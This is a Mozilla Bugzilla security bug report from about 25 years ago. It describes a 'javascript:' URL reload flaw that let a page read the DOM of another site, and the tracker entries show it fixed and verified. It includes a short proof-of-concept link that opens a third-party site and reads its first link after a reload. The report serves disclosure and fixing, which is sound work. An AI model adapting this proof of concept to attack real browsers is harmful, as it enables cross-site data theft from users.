Closed Bug 25062 Opened 25 years ago Closed 25 years ago

Reload vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: [PDT+] Expected resolution date: 2/11)

There is a vulnerability when reloading "javascript:" URLs which allows accessing the DOM of arbitrary documents. Mozilla trusts too much the location bar. The code is: --------------------------------------------- <A HREF="javascript:a=window.open('http://www.yahoo.com','victim');a.setTimeout('al ert(\'Here is the first link: \'+document.links[0].href)',5000);alert('Reload the blank page (with empty location bar) once');" TARGET="_content2">Click here to start</A> ---------------------------------------------
Status: NEW → ASSIGNED
Keywords: beta1
Target Milestone: M14
Putting on PDT+ radar for beta1.
Whiteboard: [PDT+]
Group: netscapeconfidential?
Whiteboard: [PDT+] → [PDT+] Fix in hand
Whiteboard: [PDT+] Fix in hand → [PDT+] Expected resolution date: 2/11
Checked in fix
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.